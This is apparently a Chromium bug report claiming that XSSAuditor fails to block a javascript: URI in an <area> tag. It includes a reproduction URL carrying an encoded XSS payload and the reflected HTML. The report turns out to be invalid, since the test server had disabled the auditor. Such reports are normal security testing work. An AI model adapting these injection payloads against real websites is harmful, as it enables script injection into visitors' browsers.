XSSAuditor does not filter the area token. However, area.href does support JS URIs
Issue description

UserAgent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36

Steps to reproduce the problem:
1. Open this link: http://iq-firingrange.appspot.com/reflected/parameter/body?q=%3Cmap%20name=%22abcdef%22%3E%3Carea%20href=%22javascript:alert(1)%22%20shape=%22rect%22%20coords=%220,0,500,500%22%3E%3C/map%3E%3Cimg%20width=500%20height=500%20%20src=%22data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO9TXL0Y4OHwAAAABJRU5ErkJggg==%22%20usemap=%22%23abcdef%22%3E
2. Click the image
3. alert pops up

What is the expected behavior?
The area.href attribute gets removed by the XSSAuditor

What went wrong?
The XSSAuditor is not filtering area tags

Did this work before? N/A

Chrome version: 48.0.2564.97
Channel: n/a
OS Version:
Flash Version: Shockwave Flash 20.0 r0
Feb 29 2016
Just for posterity, the reflection is:
<html>
<body>
<map name="abcdef"><area href="javascript:alert(1)" shape="rect" coords="0,0,500,500"></map><img width=500 height=500 src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAHElEQVQI12P4//8/w38GIAXDIBKE0DHxgljNBAAO9TXL0Y4OHwAAAABJRU5ErkJggg==" usemap="#abcdef">
</body>
</html>
Feb 29 2016
Your server is sending an X-XSS-Protect: 0 header. XSSAuditor catches this in my test environment. Thanks.
Feb 29 2016
OMG, how did I miss that. Sorry for wasting your time.
Comment 1 by tsepez@chromium.org, Feb 29 2016
Status: Assigned (was: Unconfirmed)